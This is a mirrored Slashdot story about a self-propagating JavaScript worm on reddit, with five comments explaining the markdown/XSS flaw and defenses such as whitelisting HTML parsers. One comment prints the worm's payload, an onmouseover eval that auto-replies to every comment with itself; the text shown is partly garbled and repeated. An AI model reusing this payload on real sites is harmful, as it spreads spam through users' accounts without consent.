Slashdot Mirror

← Back to Stories (view on slashdot.org)

Reddit Javascript Exploit Spreading Virally

Posted by CmdrTaco on from the hate-when-that-happens dept.

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

5 of 239 comments (clear)

  1. Re:proof of concept by immortalpob · · Score: 4, Informative

    This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

  2. Re:Well, that site has a terrible design by aoni782 · · Score: 4, Informative
    The script:

    z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

  3. Mod parent down by bluej100 · · Score: 3, Informative

    The correct solution is a whitelisted HTML parser and generator, like HTML Purifier.

  4. Re:Is this good news or bad? by blowdart · · Score: 3, Informative

    No it's not. The Reddit hack was a Cross Site Scripting attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were ran to directly put data into the database. It's an entirely different vector and an entirely different vulnerability, all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.

  5. Re:Is this good news or bad? by Serious+Callers+Only · · Score: 3, Informative

    Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.